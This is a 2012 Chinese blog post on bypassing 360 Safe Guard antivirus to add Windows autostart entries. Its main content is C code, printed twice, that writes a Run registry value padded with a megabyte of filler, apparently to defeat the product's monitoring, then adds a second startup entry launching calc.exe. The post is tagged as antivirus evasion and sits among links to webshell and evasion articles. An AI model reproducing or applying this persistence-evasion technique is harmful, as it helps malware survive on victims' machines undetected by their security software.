绕过360安全卫士写自启动项

发表于 2012年11月18日
VC

360把自启逼上死路，系统各种敏感操作全监控，服务注册强上线什么的，，意义都不大了，很多人去掉了自启;

但在我看来这样已经推动了本身的意义了，下边这方法也有些老了不一定有用，但也是种思路

360的各种误报误杀，将会越来越多，你成立再及时的误报检测部门也没用，这跟你小偷小摸的做法相扣

360安全卫士写自启动项

int _tmain(int argc, _TCHAR* argv[])
{
HKEY hKey;
char *Path,*Path2="c:\\windows\\notepad.exe   --";
LONG ret;
ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
if(ret)
{
   printf("打开注册表项失败");
   return 0;
}
Path=new char[1024*1024];
memset(Path,'p',1024*1024);
memcpy(Path,Path2,strlen(Path2));
ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path));
if(ret==0)
{
   printf("写入成功");
}
else
{
   printf("写入失败");
}
strcpy(Path,"c:\\windows\\system32\\calc.exe");
ret=RegSetValueEx(hKey,"TEST2",0,REG_SZ,(BYTE *)Path,strlen(Path));
if(ret==0)
{
   printf("写入成功");
}
else
{
   printf("写入失败");
}
return 0;
}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

int _tmain(int argc, _TCHAR* argv[])

{

HKEY hKey;

char *Path,*Path2="c:\\windows\\notepad.exe --";

LONG ret;

ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);

if(ret)

{

printf("打开注册表项失败");

return 0;

}

Path=new char[1024*1024];

memset(Path,'p',1024*1024);

memcpy(Path,Path2,strlen(Path2));

ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path));

if(ret==0)

{

printf("写入成功");

}

else

{

printf("写入失败");

}

strcpy(Path,"c:\\windows\\system32\\calc.exe");

ret=RegSetValueEx(hKey,"TEST2",0,REG_SZ,(BYTE *)Path,strlen(Path));

if(ret==0)

{

printf("写入成功");

}

else

{

printf("写入失败");

}

return 0;

}

标签：360 , 免杀原文连接：绕过360安全卫士写自启动项 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

IE下js调试工具Companion.JS 汇编免杀基础知识

PowerShell脚本免杀/bypass/绕过杀毒软件

PowerShell脚本免杀/bypass/绕过杀毒软件

回调函数绕过D盾小套路

回调函数绕过D盾小套路

Windows杀毒软件进程与描述收集

Windows杀毒软件进程与描述收集

可执行文件代码变形引擎，用于免杀与混淆：metame

可执行文件代码变形引擎，用于免杀与混淆：metame

免杀WebShell PHP一句话，过D盾

免杀WebShell PHP一句话，过D盾

利用PHP反序列化免杀D盾、安全狗等WAF软件

利用PHP反序列化免杀D盾、安全狗等WAF软件

异或免杀D盾PHP一句话

异或免杀D盾PHP一句话

再丢个过D盾免杀PHP一句话木马

再丢个过D盾免杀PHP一句话木马

Mos macOS下平滑鼠标滚动/滚动方向小工具

Mos macOS下平滑鼠标滚动/滚动方向小工具

Flutter 中设置 Google Maps 样式深色模式

Flutter 中设置 Google Maps 样式深色模式

解决WordPress上传svg/ico/webp，您无权上传此文件类型

解决WordPress上传svg/ico/webp，您无权上传此文件类型

cursor, 一款基于 vscode 的 AI IDE

cursor, 一款基于 vscode 的 AI IDE

git 设置和取消代理

2024免费在线影视/动漫番剧优质网站，合集汇总更新

2024免费在线影视/动漫番剧优质网站，合集汇总更新

解决Xcode：Unable to boot device because it cannot be located on disk.

解决Xcode：Unable to boot device because it cannot be located on disk.

Flutter使用JsBridge方式处理Webview与H5通信

Flutter使用JsBridge方式处理Webview与H5通信